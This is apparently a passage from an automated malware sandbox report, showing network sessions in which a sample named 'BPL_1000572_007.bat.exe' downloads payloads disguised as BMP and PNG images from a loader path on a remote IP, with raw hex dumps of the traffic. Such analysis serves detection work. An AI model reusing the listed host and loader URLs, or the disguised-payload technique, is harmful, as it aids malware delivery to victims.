                                                                  Data Raw: 32 33 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 68 65 63 6b 20 79 6f 75 72 20 49 50 20 61 64 64 72 65 73 73 20 28 49 50 76 34 20 6f 72 20 49 50 76 36 29 2c 20 67 65 6f 67 72 61 70 68 69 63 61 6c 20 49 50 20 6c 6f 63 61 74 69 6f 6e 20 61 6e 64 20 77 68 69 63 68 20 62 72 6f 77 73 65 72 20 61 6e 64 20 4f 53 20 79 6f 75 20 61 72 65 20 75 73 69 6e 67 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 69 70 2c 20 61 64 64 72 65 73 73 2c 20 6c 6f 63 61 74 69 6f 6e 2c 20 67 65 6f 20 6c 6f 63 61 74 69 6f 6e 2c 20 69 70 20 6c 6f 63 61 74 69 6f 6e 2c 20 69 70 20 61 64 64 72 65 73 73 2c 20 63 68 65 63 6b 20 69 70 2c 20 73 68 6f 77 20 69 70 2c 20 73 68 6f 77 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 6c 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 68 6f 77 20 49 50 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 68 65 63 6b 20 79 6f 75 72 20 49 50 20 61 64 64 72 65 73 73 20 28 49 50 76 34 20 6f 72 20 49 50 76 36 29 2c 20 67 65 6f 67 72 61 70 68 69 63 61 6c 20 49 50 20 6c 6f 63 61 74 69 6f 6e 20 61 6e 64 20 77 68 69 63 68 20 62 72 6f 77 73 65 72 20 61 6e 64 20 4f 53 20 79 6f 75 20 61 72 65 20 75 73 69 6e 67 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 66 62 3a 61 64 6d 69 6e 73 22 20 63 6f 6e 74 65 6e 74 3d 22 36 37 36 31 31 30 32 36 35 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 59 6f 75 72 20 49 50 20 61 64 64 72 65 73 73 20 28 49 50 76 34 20 6f 72 20 49 50 76 36 29 2c 20 67 65 6f 67 72 61 70 68 69 63 61 6c 20 49 50 20 6c 6f 63 61 74 69 6f 6e 2c 20 62 72 6f 77 73 65 72 20 61 6e 64 20 6f 70 65 72 61 74 69 6e 67 20 73 79 73 74 65 6d 20 2d 20 53 68 6f 77 20 49 50 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 59 6f 75 72 20 49 50 20 61 64 64 72 65 73 73 20 28 49 50 76 34 20 6f 72 20 49 50 76 36 29 2c 20 67 65 6f 67 72 61 70 68 69 63 61 6c 20 49 50 20 6c 6f 63 61 74 69 6f 6e 2c 20 62 72 6f 77 73 65 72 20 61 6e 64 20 6f 70 65 72 61 74 69 6e 67 20 73 79 73 74 65 6d 20 2d 20 53 68 6f 77 20 49 50 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61
                                                                  Data Ascii: 2393<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="description" content="Check your IP address (IPv4 or IPv6), geographical IP location and which browser and OS you are using"> <meta name="keywords" content="ip, address, location, geo location, ip location, ip address, check ip, show ip, show"> <meta name="robots" content="All"> <meta property="og:site_name" content="Show IP"> <meta property="og:type" content="website"> <meta property="og:description" content="Check your IP address (IPv4 or IPv6), geographical IP location and which browser and OS you are using"> <meta property="fb:admins" content="676110265"> <meta property="og:title" content="Your IP address (IPv4 or IPv6), geographical IP location, browser and operating system - Show IP"> <title>Your IP address (IPv4 or IPv6), geographical IP location, browser and operating system - Show IP</title> <script type="applica


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  2192.168.2.649709185.252.178.6380C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 23, 2022 08:01:28.979443073 CEST931OUTGET /loader/uploads/inf_Hpgwbzkt.bmp HTTP/1.1
                                                                  Host: 185.252.178.63
                                                                  Connection: Keep-Alive
                                                                  Sep 23, 2022 08:01:29.045222998 CEST932INHTTP/1.1 200 OK
                                                                  Date: Fri, 23 Sep 2022 06:01:28 GMT
                                                                  Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
                                                                  Last-Modified: Thu, 22 Sep 2022 12:18:33 GMT
                                                                  ETag: "1a391e-5e9430f651a29"
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 1718558
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: image/bmp
                                                                  Data Raw: 42 4d 1e 39 1a 00 00 00 00 00 8a 00 00 00 7c 00 00 00 17 02 00 00 23 03 00 00 01 00 20 00 03 00 00 00 94 38 1a 00 13 0b 00 00 13 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 ff 00 00 ff 00 00 ff 00 00 00 42 47 52 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff f3 f9 f8 ff f3 f9 f8 ff f3 f9 f8 ff f3 f9 f8 ff f5 fb fa ff f4 fa f9 ff f3 f9 f8 ff f3 f9 f8 ff f4 fa f9 ff f3 f9 f9 ff f3 f9 f7 ff f2 f8 f7 ff f5 fa f9 ff f4 f9 f7 ff f4 f7 f6 ff f3 f6 f5 ff f0 f8 ef ff ee f6 ec ff ed f2 e9 ff eb f0 e7 ff ec ef e6 ff ed ee e5 ff ec ec e4 ff e9 ea e1 ff ea e8 e0 ff ea e8 e0 ff ea e8 e0 ff ea e8 e0 ff e9 e7 df ff e9 e7 df ff ea e8 e0 ff ea e9 e1 ff e8 e8 e4 ff e7 e9 e5 ff e9 ea e6 ff e9 ea e6 ff ea eb e7 ff ea eb e7 ff ea eb e7 ff ea eb e7 ff eb ec e8 ff ec ed e9 ff ed ee ea ff ed ee ea ff ed ee ea ff ee ef eb ff f0 f1 ed ff f0 f1 ed ff f0 f3 ee ff ee f2 ed ff ef f0 ec ff ed ef e9 ff ee f0 ea ff ef ef e9 ff ed ef e5 ff ec ed e4 ff ee eb e6 ff ee eb e5 ff ed ea e5 ff ec e9 e4 ff ec e9 e3 ff ec e9 e3 ff ec e9 e3 ff ec e9 e3 ff ec e9 e4 ff ed ea e5 ff ed ea e5 ff ed ea e5 ff ec e9 e4 ff eb e8 e3 ff ea e7 e1 ff e8 e5 e0 ff e8 e4 df ff e7 e3 de ff e6 e2 dd ff e6 e2 dd ff e4 e0 db ff e4 e0 db ff e4 e0 db ff e4 e0 db ff e4 de d8 ff e4 de d7 ff e4 de d7 ff e4 de d7 ff e2 dc d5 ff e1 db d4 ff e1 db d4 ff e1 db d4 ff e3 db d4 ff e3 db d4 ff e3 db d4 ff e1 db d4 ff e1 db d4 ff e0 dc d4 ff df dc d4 ff df dc d4 ff df dc d4 ff df dc d4 ff df dc d4 ff df dc d4 ff df dc d4 ff df dc d4 ff e0 dd d5 ff e1 de d6 ff e1 df d7 ff e1 df d7 ff e3 e1 d9 ff e4 e2 da ff e5 e3 db ff e7 e5 dd ff e7 e5 dd ff e8 e6 de ff e7 e8 df ff e7 ea e1 ff e7 ea e1 ff e8 eb e2 ff e8 eb e2 ff e8 eb e2 ff e8 eb e2 ff e8 eb e2 ff e8 eb e2 ff e8 eb e2 ff e8 eb e2 ff e8 eb e2 ff e8 eb e2 ff e8 eb e2 ff e8 eb e2 ff e8 eb e2 ff e8 e9 e3 ff ea e9 e5 ff ea e9 e5 ff ea ea e6 ff eb ec e8 ff ec ed e9 ff f0 ed e9 ff bd b1 af ff 7a 76 77 ff 6a 70 75 ff 60 65 68 ff 57 5c 60 ff 4f 55 59 ff 4c 52 5c ff 61 67 76 ff 65 6c 7e ff 63 6c 7f ff 5c 67 7a ff 5f 67 7b ff 64 6a 7e ff 59 60 70 ff 51 5a 66 ff 59 61 6f ff 61 68 7a ff 5c 64 77 ff 5d 65 78 ff 5a 60 6f ff 45 48 53 ff 43 44 4c ff 4b 4b 51 ff 4d 4d 53 ff 4c 4c 55 ff 4f 4d 57 ff 50 4c 57 ff 50 54 5e ff 51 5a 63 ff 58 60 67 ff 4b 50 54 ff 50 55 5b ff 68 71 7b ff 69 71 7f ff 6e 73 85 ff 6c 70 81 ff 66 69 78 ff 68 6b 7a ff 6d 6f 7f ff 69 6b 7d ff 68 6c 81 ff 6d 72 84 ff 6a 6e 79 ff 50 50 58 ff 36 34 37 ff 37 33 34 ff 34 30 2f ff 3c 39 38 ff 3c 3a 3b ff 35 33 34 ff 4d 48 4b ff 63 65 6f ff 68 71 82 ff 54 5d 6d ff 41 45 4e ff 4f 50 53 ff 40 42 43 ff 2b 2a 2b ff 2f 2a 29 ff 2b 27 29 ff 2f 2e 39 ff 4d 4e 61 ff 5b 5d 72 ff 52 59 66 ff 35 3a 46 ff 29 2f 3a ff 2b 2d 36 ff 37 39 41 ff 31 2e 33 ff 1e 1b 1d ff 1b 1c 1d ff 23 28 2d ff 3c 44 4f ff 49 55 65 ff 3e 4c 5d ff 2e 37 46 ff 29 2d 35 ff 32 34 38 ff 35 34 37 ff 29 2a 2d ff 27 29 2e ff 37 3b 43 ff 48 50 57 ff 4e 57 61 ff 55 5e 6d ff 4f 59 65
                                                                  Data Ascii: BM9|# 8BGRszvwjpu`ehW\`OUYLR\agvel~cl\gz_g{dj~Y`pQZfYaoahz\dw]exZ`oEHSCDLKKQMMSLLUOMWPLWPT^QZcX`gKPTPU[hq{iqnslpfixhkzmoik}hlmrjnyPPX64773440/<98<:;534MHKceohqT]mAENOPS@BC+*+/*)+')/.9MNa[]rRYf5:F)/:+-679A1.3#(-<DOIUe>L].7F)-5248547)*-').7;CHPWNWaU^mOYe


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  3192.168.2.649710185.252.178.6380C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 23, 2022 08:01:29.985260010 CEST2714OUTGET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1
                                                                  Host: 185.252.178.63
                                                                  Connection: Keep-Alive
                                                                  Sep 23, 2022 08:01:30.032283068 CEST2715INHTTP/1.1 200 OK
                                                                  Date: Fri, 23 Sep 2022 06:01:29 GMT
                                                                  Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
                                                                  Last-Modified: Thu, 22 Sep 2022 08:05:33 GMT
                                                                  ETag: "bf400-5e93f8695c45a"
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 783360
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: image/png
                                                                  Data Raw: 1e 22 f6 68 76 74 76 69 6e 63 70 72 93 9e 64 53 c0 66 68 75 74 76 69 6a 23 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 d3 78 66 68 7b 6b cc 67 6a d7 79 bf 4d d9 65 1f b5 47 3c 1d 1d 05 49 1a 11 1f 15 1e 00 09 73 1b 07 06 1b 1b 02 49 08 06 50 00 19 0f 44 3a 16 46 2c 3a 27 56 04 05 07 15 5c 61 6c 6e 77 78 66 68 75 74 76 69 3a 26 70 72 20 60 67 53 39 71 44 16 74 76 69 6a 63 70 72 6c 81 64 5d 59 6d 69 73 74 76 85 61 63 70 74 6c 61 64 53 78 66 ee 7f 78 76 69 4a 63 70 72 4c 6d 64 53 78 26 68 75 54 76 69 6a 61 70 72 68 61 64 53 78 66 68 75 70 76 69 6a 63 70 72 6c 61 04 5f 78 66 6a 75 74 76 69 6a 63 73 72 2c e4 64 53 68 66 68 65 74 76 69 6a 73 70 72 7c 61 64 53 78 66 68 65 74 76 69 6a 63 70 72 6c 61 64 53 54 6c 64 75 23 76 69 6a 63 50 7e 6c 35 67 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 35 78 76 65 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 73 78 66 60 75 74 76 69 6a 63 70 72 6c 61 64 5b 58 66 68 3d 74 76 69 6a 63 70 72 6c 61 64 53 56 12 0d 0d 00 76 69 6a ef 9a 79 6c 61 44 53 78 66 84 7e 74 76 6b 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 49 6a 63 10 5c 1e 12 16 30 78 66 68 21 77 76 69 6a 43 7c 72 6c 65 64 53 78 88 63 75 74 76 69 6a 63 70 72 6c 61 64 53 78 26 68 75 34 58 1b 0f 0f 1f 11 6c 61 68 53 78 66 68 35 78 76 69 68 63 70 72 9e 6a 64 53 78 66 68 75 74 76 69 6a 63 70 72 2c 61 64 11 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 0e 62 79 74 76 69 6a 63 38 72 6c 61 66 53 7d 66 4c 14 7e 76 61 c3 62 70 73 6c 61 64 53 78 66 68 fd 03 74 69 f6 8a 77 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 6a 5a 6a 70 65 6c 61 64 53 78 66 68 63 58 73 7f 46 6a 5b 7c 44 63 64 53 7e 4d 9c 5d 6c 76 69 6c 48 70 58 6c 67 4e 53 78 65 58 7f 74 67 69 6a 63 70 72 6c 61 66 45 6e 4a 60 53 5c 68 69 6a 69 5b 71 4a 4a 92 79 78 66 68 76 44 7d 69 0f 63 70 72 6c 61 64 53 7a 4e 76 75 74 7c 6a 47 65 03 6d 6c 61 6e 29 7b 09 4d 70 74 70 45 6c 10 50 72 6c 6b 1e 51 7b 73 45 58 52 50 6b 69 0c 57 77 6c 67 e9 42 78 66 69 62 59 55 4f 4c 61 72 5a 6a 61 64 55 61 4b 76 53 52 74 6b 42 64 70 72 6a 1c 60 53 78 62 43 60 09 77 69 6a 67 5b bc 11 63 64 53 7c 4d b0 08 77 76 69 6e 48 ad 58 6c 61 64 50 48 6c 68 63 74 76 69 6a 63 70 72 6e 79 7a 7e 75 40 13 74 74 76 6d 05 45 75 72 6a 4a 67 75 53 97 42 75 74 75 59 60 63 69 72 6c 61 64 53 78 66 6a 69 6f 5b 79 4c 18 71 72 6c 65 0b 74 7d 66 6e 6a 7e 2f 42 69 45 5b 9c 46 61 64 53 7b 56 62 75 65 76 69 6a 63 70 72 6c 63 7c 46 55 6e 4e 0e 77 76 69 6e 48 73 54 47 97 4e 53 78 66 6b 45 7e 76 78 6a 63 70 72 6c 61 64 51 62 7b 45 7d 52 0d 6d 6a 63 74 59 6f 47 4f a5 52 66 68 75 77 46 63 6a 49 70 72 6c 61 64 53 78 64 7e 60 59 6d 4f 69 75 66 5e 74 47 60 4e 60 4b 7d 53 71 78 6d 64 66 7e 74 44 6a 64 53 7e 4d 61 53 5f 95 4f 41 85 56 59 85 4b 64 53 6b 56 63 75 0b 76 69 6a 62 70 72 7d 63 1f 52 78 66 6c 1a 53 73 69 6c 7f 5d 37 4a 63 1f 51 78 66 6c 62 59 48 4f 68 18 71 72 6c 65 67 57 7d 61 7e
                                                                  Data Ascii: "hvtvincprdSfhutvij#prladSxfhutvijcprladSxfhutvijcprladxfh{kgjyMeG<IsIPD:F,:'V\alnwxfhutvi:&pr `gS9qDtvijcprld]YmistvacptladSxfxviJcprLmdSx&huTvijaprhadSxfhupvijcprla_xfjutvijcsr,dShfhetvijspr|adSxfhetvijcprladSTldu#vijcP~l5gSxfhutvijcprladSxfh5xvejcprladSxfhutvijcprladSxfhutvijcprladSxfhutvijcprladsxf`utvijcprlad[Xfh=tvijcprladSVvijylaDSxf~tvkjcprladSxfhutvIjc\0xfh!wvijC|rledSxcutvijcprladSx&hu4XlahSxfh5xvihcprjdSxfhutvijcpr,adxfhutvijcprladSxbytvijc8rlafS}fL~vabpsladSxfhtiwrladSxfhutvijcprladSxfhutvijcprladSxfhutvjZjpeladSxfhcXsFj[|DcdS~M]lvilHpXlgNSxeXtgijcprlafEnJ`S\hiji[qJJyxfhvD}icprladSzNvut|jGemlan){MptpElPrlkQ{sEXRPkiWwlgBxfibYUOLarZjadUaKvSRtkBdprj`SxbC`wijg[cdS|MwvinHXladPHlhctvijcprnyz~u@ttvmEurjJguSButuY`cirladSxfjio[yLqrlet}fnj~/BiE[FadS{Vbuevijcprlc|FUnNwvinHsTGNSxfkE~vxjcprladQb{E}RmjctYoGORfhuwFcjIprladSxd~`YmOiuf^tG`N`K}Sqxmdf~tDjdS~MaS_OAVYKdSkVcuvijbpr}cRxflSsil]7JcQxflbYHOhqrlegW}a~


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  4192.168.2.649711185.252.178.6380C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 23, 2022 08:01:37.884829998 CEST3522OUTGET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1
                                                                  Host: 185.252.178.63
                                                                  Connection: Keep-Alive
                                                                  Sep 23, 2022 08:01:37.922528028 CEST3524INHTTP/1.1 200 OK
                                                                  Date: Fri, 23 Sep 2022 06:01:37 GMT
                                                                  Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
                                                                  Last-Modified: Thu, 22 Sep 2022 08:05:33 GMT
                                                                  ETag: "bf400-5e93f8695c45a"
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 783360
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: image/png
                                                                  Data Raw: 1e 22 f6 68 76 74 76 69 6e 63 70 72 93 9e 64 53 c0 66 68 75 74 76 69 6a 23 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 d3 78 66 68 7b 6b cc 67 6a d7 79 bf 4d d9 65 1f b5 47 3c 1d 1d 05 49 1a 11 1f 15 1e 00 09 73 1b 07 06 1b 1b 02 49 08 06 50 00 19 0f 44 3a 16 46 2c 3a 27 56 04 05 07 15 5c 61 6c 6e 77 78 66 68 75 74 76 69 3a 26 70 72 20 60 67 53 39 71 44 16 74 76 69 6a 63 70 72 6c 81 64 5d 59 6d 69 73 74 76 85 61 63 70 74 6c 61 64 53 78 66 ee 7f 78 76 69 4a 63 70 72 4c 6d 64 53 78 26 68 75 54 76 69 6a 61 70 72 68 61 64 53 78 66 68 75 70 76 69 6a 63 70 72 6c 61 04 5f 78 66 6a 75 74 76 69 6a 63 73 72 2c e4 64 53 68 66 68 65 74 76 69 6a 73 70 72 7c 61 64 53 78 66 68 65 74 76 69 6a 63 70 72 6c 61 64 53 54 6c 64 75 23 76 69 6a 63 50 7e 6c 35 67 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 35 78 76 65 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 73 78 66 60 75 74 76 69 6a 63 70 72 6c 61 64 5b 58 66 68 3d 74 76 69 6a 63 70 72 6c 61 64 53 56 12 0d 0d 00 76 69 6a ef 9a 79 6c 61 44 53 78 66 84 7e 74 76 6b 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 49 6a 63 10 5c 1e 12 16 30 78 66 68 21 77 76 69 6a 43 7c 72 6c 65 64 53 78 88 63 75 74 76 69 6a 63 70 72 6c 61 64 53 78 26 68 75 34 58 1b 0f 0f 1f 11 6c 61 68 53 78 66 68 35 78 76 69 68 63 70 72 9e 6a 64 53 78 66 68 75 74 76 69 6a 63 70 72 2c 61 64 11 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 0e 62 79 74 76 69 6a 63 38 72 6c 61 66 53 7d 66 4c 14 7e 76 61 c3 62 70 73 6c 61 64 53 78 66 68 fd 03 74 69 f6 8a 77 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 6a 5a 6a 70 65 6c 61 64 53 78 66 68 63 58 73 7f 46 6a 5b 7c 44 63 64 53 7e 4d 9c 5d 6c 76 69 6c 48 70 58 6c 67 4e 53 78 65 58 7f 74 67 69 6a 63 70 72 6c 61 66 45 6e 4a 60 53 5c 68 69 6a 69 5b 71 4a 4a 92 79 78 66 68 76 44 7d 69 0f 63 70 72 6c 61 64 53 7a 4e 76 75 74 7c 6a 47 65 03 6d 6c 61 6e 29 7b 09 4d 70 74 70 45 6c 10 50 72 6c 6b 1e 51 7b 73 45 58 52 50 6b 69 0c 57 77 6c 67 e9 42 78 66 69 62 59 55 4f 4c 61 72 5a 6a 61 64 55 61 4b 76 53 52 74 6b 42 64 70 72 6a 1c 60 53 78 62 43 60 09 77 69 6a 67 5b bc 11 63 64 53 7c 4d b0 08 77 76 69 6e 48 ad 58 6c 61 64 50 48 6c 68 63 74 76 69 6a 63 70 72 6e 79 7a 7e 75 40 13 74 74 76 6d 05 45 75 72 6a 4a 67 75 53 97 42 75 74 75 59 60 63 69 72 6c 61 64 53 78 66 6a 69 6f 5b 79 4c 18 71 72 6c 65 0b 74 7d 66 6e 6a 7e 2f 42 69 45 5b 9c 46 61 64 53 7b 56 62 75 65 76 69 6a 63 70 72 6c 63 7c 46 55 6e 4e 0e 77 76 69 6e 48 73 54 47 97 4e 53 78 66 6b 45 7e 76 78 6a 63 70 72 6c 61 64 51 62 7b 45 7d 52 0d 6d 6a 63 74 59 6f 47 4f a5 52 66 68 75 77 46 63 6a 49 70 72 6c 61 64 53 78 64 7e 60 59 6d 4f 69 75 66 5e 74 47 60 4e 60 4b 7d 53 71 78 6d 64 66 7e 74 44 6a 64 53 7e 4d 61 53 5f 95 4f 41 85 56 59 85 4b 64 53 6b 56 63 75 0b 76 69 6a 62 70 72 7d 63 1f 52 78 66 6c 1a 53 73 69 6c 7f 5d 37 4a 63 1f 51 78 66 6c 62 59 48 4f 68 18 71 72 6c 65 67 57 7d 61 7e
                                                                  Data Ascii: "hvtvincprdSfhutvij#prladSxfhutvijcprladSxfhutvijcprladxfh{kgjyMeG<IsIPD:F,:'V\alnwxfhutvi:&pr `gS9qDtvijcprld]YmistvacptladSxfxviJcprLmdSx&huTvijaprhadSxfhupvijcprla_xfjutvijcsr,dShfhetvijspr|adSxfhetvijcprladSTldu#vijcP~l5gSxfhutvijcprladSxfh5xvejcprladSxfhutvijcprladSxfhutvijcprladSxfhutvijcprladsxf`utvijcprlad[Xfh=tvijcprladSVvijylaDSxf~tvkjcprladSxfhutvIjc\0xfh!wvijC|rledSxcutvijcprladSx&hu4XlahSxfh5xvihcprjdSxfhutvijcpr,adxfhutvijcprladSxbytvijc8rlafS}fL~vabpsladSxfhtiwrladSxfhutvijcprladSxfhutvijcprladSxfhutvjZjpeladSxfhcXsFj[|DcdS~M]lvilHpXlgNSxeXtgijcprlafEnJ`S\hiji[qJJyxfhvD}icprladSzNvut|jGemlan){MptpElPrlkQ{sEXRPkiWwlgBxfibYUOLarZjadUaKvSRtkBdprj`SxbC`wijg[cdS|MwvinHXladPHlhctvijcprnyz~u@ttvmEurjJguSButuY`cirladSxfjio[yLqrlet}fnj~/BiE[FadS{Vbuevijcprlc|FUnNwvinHsTGNSxfkE~vxjcprladQb{E}RmjctYoGORfhuwFcjIprladSxd~`YmOiuf^tG`N`K}Sqxmdf~tDjdS~MaS_OAVYKdSkVcuvijbpr}cRxflSsil]7JcQxflbYHOhqrlegW}a~


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  5192.168.2.649712185.252.178.6380C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 23, 2022 08:01:54.005892038 CEST4336OUTGET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1
                                                                  Host: 185.252.178.63
                                                                  Connection: Keep-Alive
                                                                  Sep 23, 2022 08:01:54.042484999 CEST4337INHTTP/1.1 200 OK
                                                                  Date: Fri, 23 Sep 2022 06:01:54 GMT
                                                                  Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
                                                                  Last-Modified: Thu, 22 Sep 2022 08:05:33 GMT
                                                                  ETag: "bf400-5e93f8695c45a"
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 783360
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: image/png
                                                                  Data Raw: 1e 22 f6 68 76 74 76 69 6e 63 70 72 93 9e 64 53 c0 66 68 75 74 76 69 6a 23 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 d3 78 66 68 7b 6b cc 67 6a d7 79 bf 4d d9 65 1f b5 47 3c 1d 1d 05 49 1a 11 1f 15 1e 00 09 73 1b 07 06 1b 1b 02 49 08 06 50 00 19 0f 44 3a 16 46 2c 3a 27 56 04 05 07 15 5c 61 6c 6e 77 78 66 68 75 74 76 69 3a 26 70 72 20 60 67 53 39 71 44 16 74 76 69 6a 63 70 72 6c 81 64 5d 59 6d 69 73 74 76 85 61 63 70 74 6c 61 64 53 78 66 ee 7f 78 76 69 4a 63 70 72 4c 6d 64 53 78 26 68 75 54 76 69 6a 61 70 72 68 61 64 53 78 66 68 75 70 76 69 6a 63 70 72 6c 61 04 5f 78 66 6a 75 74 76 69 6a 63 73 72 2c e4 64 53 68 66 68 65 74 76 69 6a 73 70 72 7c 61 64 53 78 66 68 65 74 76 69 6a 63 70 72 6c 61 64 53 54 6c 64 75 23 76 69 6a 63 50 7e 6c 35 67 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 35 78 76 65 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 73 78 66 60 75 74 76 69 6a 63 70 72 6c 61 64 5b 58 66 68 3d 74 76 69 6a 63 70 72 6c 61 64 53 56 12 0d 0d 00 76 69 6a ef 9a 79 6c 61 44 53 78 66 84 7e 74 76 6b 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 49 6a 63 10 5c 1e 12 16 30 78 66 68 21 77 76 69 6a 43 7c 72 6c 65 64 53 78 88 63 75 74 76 69 6a 63 70 72 6c 61 64 53 78 26 68 75 34 58 1b 0f 0f 1f 11 6c 61 68 53 78 66 68 35 78 76 69 68 63 70 72 9e 6a 64 53 78 66 68 75 74 76 69 6a 63 70 72 2c 61 64 11 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 0e 62 79 74 76 69 6a 63 38 72 6c 61 66 53 7d 66 4c 14 7e 76 61 c3 62 70 73 6c 61 64 53 78 66 68 fd 03 74 69 f6 8a 77 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 6a 5a 6a 70 65 6c 61 64 53 78 66 68 63 58 73 7f 46 6a 5b 7c 44 63 64 53 7e 4d 9c 5d 6c 76 